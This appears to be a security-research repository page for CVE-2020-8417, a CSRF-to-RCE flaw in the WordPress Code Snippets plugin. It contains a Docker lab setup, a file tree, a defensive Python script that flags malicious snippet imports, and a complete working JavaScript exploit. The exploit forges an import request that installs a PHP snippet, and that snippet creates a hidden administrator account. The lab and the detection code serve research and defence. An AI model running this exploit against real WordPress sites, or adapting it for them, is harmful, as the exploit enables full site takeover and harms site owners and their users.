Associated Vulnerability
Title: WordPress Code Snippets Cross-Site Request Forgery Vulnerability (CVE-2020-8417)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation; it lets users host a personal blog on a server running PHP and MySQL. A cross-site request forgery vulnerability exists in WordPress Code Snippets versions before 2.14.0, caused by the program failing to properly validate user input. A remote attacker can exploit it with a malformed HTTP request to inject executable code into a vulnerable site.
Description
Docker repository with a PoC for WP Code Snippets 2.13.3 (CVE-2020-8417)
Readme
# WP Code Snippets Vulnerability (CVE-2020-8417)
This is a Docker PoC for the Code Snippets vulnerability, intended for security researchers. This repository also contains a walkthrough of how the vulnerability is exploited. Over 200K WordPress websites were vulnerable to this exploit at the time of discovery.
#### WP Code Snippets
[https://wordpress.org/plugins/code-snippets/#developers](https://wordpress.org/plugins/code-snippets/#developers)
## Disclaimer
This code is vulnerable and should not be run in production or exposed through a DMZ/firewall.
# CVE-2020-8417
The Code Snippets plugin before 2.14.0 has a high-severity Cross-Site Request Forgery (CSRF) vulnerability that, when exploited, leads to remote code execution (RCE) and complete site takeover.
[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8417](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8417)
[https://nvd.nist.gov/vuln/detail/CVE-2020-8417](https://nvd.nist.gov/vuln/detail/CVE-2020-8417)
[https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-8417](https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-8417)
[https://wpvulndb.com/vulnerabilities/10050](https://wpvulndb.com/vulnerabilities/10050)
# Getting Started
You will need to clone the repository locally and then use Docker to run the MySQL and WordPress images. Everything you need to get started is here.
### Clone the repository
```shell
git clone git@github.com:VulnCrate/WP-CodeSnippets-CVE-2020-8417.git
```
### Docker
cd into the root directory of the repository, pull the images first and then run the Docker Compose "up" command.
```shell
docker-compose pull
docker-compose up
```
### WordPress Website
You can access and view the WordPress website on your localhost address. Comments do not have to be enabled for this to work.
[http://localhost:8000](http://localhost:8000)
### If you mess up...
Starting over is really easy: run the Docker commands below to remove your containers and then run git clean to remove all of the files that were pulled down.
```shell
docker rm -f vc_wp_codesnippets_db
docker rm -f vc_wp_codesnippets
git clean -xdf
```
# Walkthrough
The vulnerability in WP Code Snippets allows anyone to use JavaScript to inject code into the site through a Cross-Site Request Forgery (CSRF) that ultimately leads to Remote Code Execution (RCE).
#### Video Walkthrough
[Video walkthrough](https://www.youtube.com/watch?v=FoKhZGpXnvI)
## PoC
Chloe Chamberland
https://twitter.com/infosecchloe
[https://wpvulndb.com/vulnerabilities/10050](https://wpvulndb.com/vulnerabilities/10050)
There's an exploit.html file included in the repository; essentially it makes a cross-site request that imports a Code Snippet hooked to the `init` action, and that snippet creates an administrative user.
#### `JavaScript`
```javascript
function submitRequest()
{
    // change this if you use this anywhere else other than localhost.
    var ip = "localhost";
    var maliciousCode = "add_action( 'init', function () {" +
        "$username = 'hacker';" +
        "$password = 'pa$$word';" +
        "$email_address = 'hacker@vulncrate.com';" +
        "if ( ! username_exists( $username ) ) {" +
        "$user_id = wp_create_user( $username, $password, $email_address );" +
        "$user = new WP_User( $user_id );" +
        "$user->set_role( 'administrator' );" +
        "};" +
        "} ); ?>";
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/" + ip + ":8000\/wp-admin\/admin.php?page=import-snippets", true);
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
    xhr.withCredentials = true;
    var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
        "Content-Disposition: form-data; name=\"duplicate_action\"\r\n" +
        "\r\n" +
        "ignore\r\n" +
        "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
        "Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" +
        "Content-Type: application/json\r\n" +
        "\r\n" +
        "{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-04-18 12:35\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"" + maliciousCode + "\",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" +
        "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
        "Content-Disposition: form-data; name=\"action\"\r\n" +
        "\r\n" +
        "save\r\n" +
        "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
        "Content-Disposition: form-data; name=\"max_file_size\"\r\n" +
        "\r\n" +
        "2097152\r\n" +
        "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
        "Content-Disposition: form-data; name=\"submit\"\r\n" +
        "\r\n" +
        "Upload files and import\r\n" +
        "------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
```
#### `HTML`
```html
<form action="#">
    <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
```
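As an added defender-side example (not part of the PoC repository), the Python below parses a Code Snippets export in the JSON shape the request above uploads and flags snippets that hook `init`, create a user and grant it the administrator role, and it classifies a POST to the import page as cross-site from its Origin/Referer headers. The pattern names and the sample export are constructed; this is an audit aid for exported snippets and access logs, not a substitute for the server-side nonce verification that closes the hole.

```python
import json
import re

# Patterns that together describe the snippet the PoC imports: an 'init' hook
# that creates a user and grants it the administrator role. Names are constructed.
SUSPICIOUS = {
    "creates_user": re.compile(r"\bwp_(?:create|insert)_user\s*\("),
    "grants_admin": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]"),
    "hooks_init": re.compile(r"add_action\s*\(\s*['\"]init['\"]"),
}

def audit_snippet_export(json_text):
    """Parse a Code Snippets export (the JSON shape the PoC uploads) and return
    (name, is_active, matched_patterns) for every snippet matching any pattern."""
    data = json.loads(json_text)
    findings = []
    for snippet in data.get("snippets", []):
        code = snippet.get("code", "")
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(code)]
        if hits:
            is_active = str(snippet.get("active", "0")) == "1"
            findings.append((snippet.get("name", "?"), is_active, hits))
    return findings

def is_cross_site_post(headers, site_origin):
    """True when a POST's Origin (or, failing that, Referer) does not belong to
    site_origin, which is how a browser-issued CSRF request looks server-side.
    headers: dict with lower-cased names; site_origin: e.g. 'http://localhost:8000'."""
    origin = headers.get("origin")
    if origin is not None:
        return origin.rstrip("/") != site_origin
    referer = headers.get("referer")
    if referer is None:
        return True  # no provenance at all: treat a state-changing POST as cross-site
    return referer != site_origin and not referer.startswith(site_origin + "/")

# Constructed sample export in the format shown in the PoC (not taken from a real site).
SAMPLE_EXPORT = json.dumps({
    "generator": "Code Snippets v2.13.3",
    "snippets": [
        {"name": "PoC", "scope": "global", "priority": "1", "active": "1",
         "code": "add_action( 'init', function () { $id = wp_create_user( $u, $p, $e );"
                 " $user = new WP_User( $id ); $user->set_role( 'administrator' ); } );"},
        {"name": "footer note", "scope": "front-end", "priority": "10", "active": "1",
         "code": "add_action( 'wp_footer', function () { echo 'hello'; } );"},
    ],
})
```

Run `audit_snippet_export` over a real export (or over the `code` column of the plugin's snippets table) and `is_cross_site_post` over the headers of POSTs to `admin.php?page=import-snippets` from your access logs.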
File Snapshot
[4.0K] /data/pocs/9eb085b28490e1ab092bb1be73d4686cf4e655d8
├── [4.0K] db
│ └── [4.0K] dump
│ └── [631K] vc_wp_codesnippets.sql
├── [ 971] docker-compose.yaml
├── [3.2K] exploit.html
├── [ 34K] LICENSE
├── [5.3K] README.md
├── [4.0K] wp
│ └── [4.0K] wp-content
│ └── [4.0K] plugins
│ └── [4.0K] code-snippets
│ ├── [ 23K] CHANGELOG.md
│ ├── [2.6K] code-snippets.php
│ ├── [ 738] composer.json
│ ├── [7.9K] composer.lock
│ ├── [4.0K] css
│ │ ├── [2.0K] editor.scss
│ │ ├── [2.1K] edit.scss
│ │ ├── [4.0K] font
│ │ │ ├── [1.4K] code-snippets.eot
│ │ │ ├── [1.5K] code-snippets.svg
│ │ │ ├── [1.3K] code-snippets.ttf
│ │ │ └── [1.3K] code-snippets.woff
│ │ ├── [ 155] front-end.scss
│ │ ├── [3.4K] manage.scss
│ │ ├── [ 554] menu-icon.scss
│ │ └── [ 78] settings.scss
│ ├── [5.1K] gulpfile.babel.js
│ ├── [4.0K] js
│ │ ├── [ 663] edit.js
│ │ ├── [ 339] editor.js
│ │ ├── [ 428] edit-tags.js
│ │ ├── [ 30] front-end.js
│ │ ├── [3.4K] manage.js
│ │ ├── [2.9K] php-lint.js
│ │ └── [1.6K] settings.js
│ ├── [4.0K] languages
│ │ ├── [ 28K] code-snippets-bel.mo
│ │ ├── [ 36K] code-snippets-bel.po
│ │ ├── [ 23K] code-snippets-de_DE.mo
│ │ ├── [ 41K] code-snippets-de_DE.po
│ │ ├── [ 23K] code-snippets-fr_CA.mo
│ │ ├── [ 38K] code-snippets-fr_CA.po
│ │ ├── [ 24K] code-snippets-fr_FR.mo
│ │ ├── [ 36K] code-snippets-fr_FR.po
│ │ ├── [ 21K] code-snippets-id_ID.mo
│ │ ├── [ 30K] code-snippets-id_ID.po
│ │ ├── [ 18K] code-snippets-it_IT.mo
│ │ ├── [ 31K] code-snippets-it_IT.po
│ │ ├── [ 16K] code-snippets-ja_JP.mo
│ │ ├── [ 21K] code-snippets-ja_JP.po
│ │ ├── [ 22K] code-snippets-nl_NL.mo
│ │ ├── [ 30K] code-snippets-nl_NL.po
│ │ ├── [ 25K] code-snippets.pot
│ │ ├── [ 21K] code-snippets-pt_BR.mo
│ │ ├── [ 30K] code-snippets-pt_BR.po
│ │ ├── [ 26K] code-snippets-ru_RU.mo
│ │ ├── [ 35K] code-snippets-ru_RU.po
│ │ ├── [ 14K] code-snippets-sk_SK.mo
│ │ ├── [ 20K] code-snippets-sk_SK.po
│ │ ├── [ 14K] code-snippets-sr_RS.mo
│ │ ├── [ 19K] code-snippets-sr_RS.po
│ │ ├── [ 11K] code-snippets-zh_CN.mo
│ │ └── [ 16K] code-snippets-zh_CN.po
│ ├── [1.0K] license.txt
│ ├── [1.7K] MENTIONS.md
│ ├── [2.1K] package.json
│ ├── [516K] package-lock.json
│ ├── [4.0K] php
│ │ ├── [4.0K] admin-menus
│ │ │ ├── [3.1K] class-admin-menu.php
│ │ │ ├── [ 20K] class-edit-menu.php
│ │ │ ├── [3.8K] class-import-menu.php
│ │ │ ├── [6.6K] class-manage-menu.php
│ │ │ └── [4.0K] class-settings-menu.php
│ │ ├── [5.6K] class-admin.php
│ │ ├── [6.9K] class-code-snippets.php
│ │ ├── [6.8K] class-contextual-help.php
│ │ ├── [4.2K] class-db.php
│ │ ├── [ 31K] class-list-table.php
│ │ ├── [1.3K] class-shortcode.php
│ │ ├── [8.5K] class-snippet.php
│ │ ├── [5.6K] class-upgrade.php
│ │ ├── [3.3K] editor.php
│ │ ├── [2.0K] functions.php
│ │ ├── [7.4K] import-export.php
│ │ ├── [4.0K] settings
│ │ │ ├── [2.4K] editor-preview.php
│ │ │ ├── [1.7K] render-fields.php
│ │ │ ├── [5.4K] settings-fields.php
│ │ │ └── [5.4K] settings.php
│ │ ├── [ 13K] snippet-ops.php
│ │ └── [4.0K] views
│ │ ├── [7.0K] edit.php
│ │ ├── [3.5K] import.php
│ │ └── [1.5K] manage.php
│ ├── [2.7K] phpcs.xml
│ ├── [ 388] phpunit.xml
│ ├── [3.0K] README.md
│ ├── [ 33K] readme.txt
│ ├── [4.0K] screenshots
│ │ ├── [ 34K] banner-772x250.png
│ │ ├── [373K] screenshot-1.png
│ │ ├── [137K] screenshot-2.png
│ │ ├── [206K] screenshot-3.png
│ │ └── [211K] screenshot-4.png
│ ├── [4.0K] tests
│ │ ├── [ 260] bootstrap.php
│ │ ├── [2.1K] install.sh
│ │ └── [ 173] test-unit-tests.php
│ └── [1.7K] uninstall.php
└── [177K] wp-code-snippets-2020-8417.jpg
16 directories, 96 files